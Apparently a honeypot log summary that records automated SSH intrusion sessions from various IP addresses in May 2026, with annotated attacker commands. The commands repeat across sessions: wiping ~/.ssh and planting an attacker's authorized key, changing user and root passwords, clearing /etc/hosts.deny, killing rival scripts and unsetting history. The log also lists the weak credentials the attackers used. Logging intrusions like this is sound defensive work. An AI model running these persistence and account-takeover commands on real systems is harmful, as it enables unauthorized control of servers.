$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "welltech12\nCb3uloUYexjU\nCb3uloUYexjU"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "welltech12\nCb3uloUYexjU\nCb3uloUYexjU\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "Wangsu@2017\nza4VsoCcX4EC\nza4VsoCcX4EC"|passwd|bash
$ echo "Wangsu@2017\nza4VsoCcX4EC\nza4VsoCcX4EC\n"|passwd
$ echo "root:SiAyuofaTZUD"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 phantom_root_58 (103.186.139.149) β€” Naic, Philippines Β· 3 sessions Β· 59 cmds
2026-05-04 15:04 EDT Β· as cloud/Wangsu@2017, curl/welltech12, root/Welcome123!@#
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "Wangsu@2017\nnrR48yPcNJCs\nnrR48yPcNJCs"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Wangsu@2017\nnrR48yPcNJCs\nnrR48yPcNJCs\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "welltech12\npKhIKZCEAtpZ\npKhIKZCEAtpZ"|passwd|bash
$ echo "welltech12\npKhIKZCEAtpZ\npKhIKZCEAtpZ\n"|passwd
$ echo "root:7OVFKWoJqmji"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 stein_root_19 (146.70.117.27) β€” Herford, Germany Β· 1 session Β· 1 cmd
2026-05-25 14:32 EDT Β· as root/CatCult2025!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ unset HISTFILE; uname -a; history -c // history snooping
🎭 k-pop_root_13 (211.251.245.88) β€” Naju, South Korea Β· 3 sessions Β· 59 cmds
2026-05-25 13:38 EDT Β· as cloud/Wangsu@2017, curl/welltech12, root/Hw123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "Wangsu@2017\ntnTzguidjsZC\ntnTzguidjsZC"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Wangsu@2017\ntnTzguidjsZC\ntnTzguidjsZC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "welltech12\nzTHdeSehvXZZ\nzTHdeSehvXZZ"|passwd|bash
$ echo "welltech12\nzTHdeSehvXZZ\nzTHdeSehvXZZ\n"|passwd
$ echo "root:1IJgh6z37xdL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 wraith_root_61 (190.181.4.12) β€” La Paz, Bolivia Β· 3 sessions Β· 59 cmds
2026-05-25 13:58 EDT Β· as cloud/Wangsu@2017, curl/welltech12, root/1233218613
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "Wangsu@2017\nIlmLBWFnlQZp\nIlmLBWFnlQZp"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Wangsu@2017\nIlmLBWFnlQZp\nIlmLBWFnlQZp\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "welltech12\nxE9Ug8SnauWf\nxE9Ug8SnauWf"|passwd|bash
$ echo "welltech12\nxE9Ug8SnauWf\nxE9Ug8SnauWf\n"|passwd
$ echo "root:AyXjEUW5CSVN"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 specter_root_59 (113.182.176.68) β€” DΔ© An, Vietnam Β· 3 sessions Β· 60 cmds
2026-05-25 13:16 EDT Β· as cloud/Wangsu@2017, curl/welltech12, daniel/daniel12
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "Wangsu@2017\nKtaO8uqk3pM9\nKtaO8uqk3pM9"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "Wangsu@2017\nKtaO8uqk3pM9\nKtaO8uqk3pM9\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "daniel12\ng789OsY7mCHj\ng789OsY7mCHj"|passwd|bash
$ echo "daniel12\ng789OsY7mCHj\ng789OsY7mCHj\n"|passwd
$ echo -e "welltech12\nrnQngYCSJobE\nrnQngYCSJobE"|passwd|bash
$ echo "welltech12\nrnQngYCSJobE\nrnQngYCSJobE\n"|passwd
🎭 seoul_root_4 (39.115.195.164) β€” Seocho-gu, South Korea Β· 8 sessions Β· 103 cmds
2026-05-22 02:53 EDT Β· as curl/welltech12, julian/julian, kontakt/kontakt
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—8 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—8 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo -e "welltech12\nkTypJIUYgziT\nkTypJIUYgziT"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "welltech12\nkTypJIUYgziT\nkTypJIUYgziT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo "root:67AR5ufRbIO6"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ echo "root:ws8TvPfHhuJG"|chpasswd|bash
$ echo "root:hO85Sa5ami3J"|chpasswd|bash
$ echo -e "kontakt\nc8JS5EiulId4\nc8JS5EiulId4"|passwd|bash
$ echo "kontakt\nc8JS5EiulId4\nc8JS5EiulId4\n"|passwd
🎭 star_root_30 (45.38.37.243) β€” Santa Clara, United States Β· 3 sessions Β· 60 cmds
2026-05-24 10:22 EDT Β· as cloud/Wangsu@2017, curl/welltech12, user/abc@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "welltech12\naSusACVynXj4\naSusACVynXj4"|passwd|bash
$ Enter new UNIX password: Γ—3
$ echo "welltech12\naSusACVynXj4\naSusACVynXj4\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "Wangsu@2017\nP226nn2dFSje\nP226nn2dFSje"|passwd|bash
$ echo "Wangsu@2017\nP226nn2dFSje\nP226nn2dFSje\n"|passwd
$ echo -e "abc@123\nwSPSLm8XlxMT\nwSPSLm8XlxMT"|passwd|bash
$ echo "abc@123\nwSPSLm8XlxMT\nwSPSLm8XlxMT\n"|passwd
🎭 cipher_pi (103.159.54.61) β€” YΓͺn XΓ‘, Vietnam Β· 1 session Β· 20 cmds
2026-05-25 13:48 EDT Β· as rapid/rapid123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "rapid123\nvaMYL6hzUEGC\nvaMYL6hzUEGC"|passwd|bash
$ Enter new UNIX password:
$ echo "rapid123\nvaMYL6hzUEGC\nvaMYL6hzUEGC\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_63 (180.178.94.221) β€” Surakarta, Indonesia Β· 2 sessions Β· 40 cmds
2026-05-25 13:18 EDT Β· as curl/welltech12, daniel/daniel12
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "welltech12\nh1UV4txbhtU4\nh1UV4txbhtU4"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "welltech12\nh1UV4txbhtU4\nh1UV4txbhtU4\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "daniel12\ndW9eK6I6pWqr\ndW9eK6I6pWqr"|passwd|bash
$ echo "daniel12\ndW9eK6I6pWqr\ndW9eK6I6pWqr\n"|passwd
🎭 frost_root_8 (188.113.168.133) β€” Yuzhno-Sakhalinsk, Russia Β· 2 sessions Β· 40 cmds
2026-05-25 13:35 EDT Β· as cloud/Wangsu@2017, curl/welltech12
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "welltech12\nIrIxPnSo2g1g\nIrIxPnSo2g1g"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "welltech12\nIrIxPnSo2g1g\nIrIxPnSo2g1g\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "Wangsu@2017\nZwTzs2ahX2Rl\nZwTzs2ahX2Rl"|passwd|bash
$ echo "Wangsu@2017\nZwTzs2ahX2Rl\nZwTzs2ahX2Rl\n"|passwd
🎭 k-pop_root_14 (222.107.254.97) β€” Seocho-gu, South Korea Β· 2 sessions Β· 40 cmds
2026-05-25 13:25 EDT Β· as cloud/Wangsu@2017, hengshi/hengshi
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Wangsu@2017\nc2lQnhEmVyrT\nc2lQnhEmVyrT"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Wangsu@2017\nc2lQnhEmVyrT\nc2lQnhEmVyrT\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "hengshi\np9rDNE3238pv\np9rDNE3238pv"|passwd|bash
$ echo "hengshi\np9rDNE3238pv\np9rDNE3238pv\n"|passwd
🎭 outback_root_2 (40.82.214.8) β€” The Rocks, Australia Β· 6 sessions Β· 115 cmds
2026-05-13 11:07 EDT Β· as root/123456qq@, root/Bl123456, root/a1q2w3e4
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—6 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—6 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—6 // CPU profiling
$ echo "root:YozPup99wKYZ"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—5 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—6 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—6
$ ls -lh $(which ls) Γ—6
$ which ls Γ—6
$ crontab -l Γ—6 // persistence setup
$ w Γ—6 // logged-in users check
$ uname -m Γ—6
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—6 // CPU profiling
$ top Γ—6 // process monitoring
$ uname Γ—6 // OS identification
$ uname -a Γ—6 // OS/kernel identification
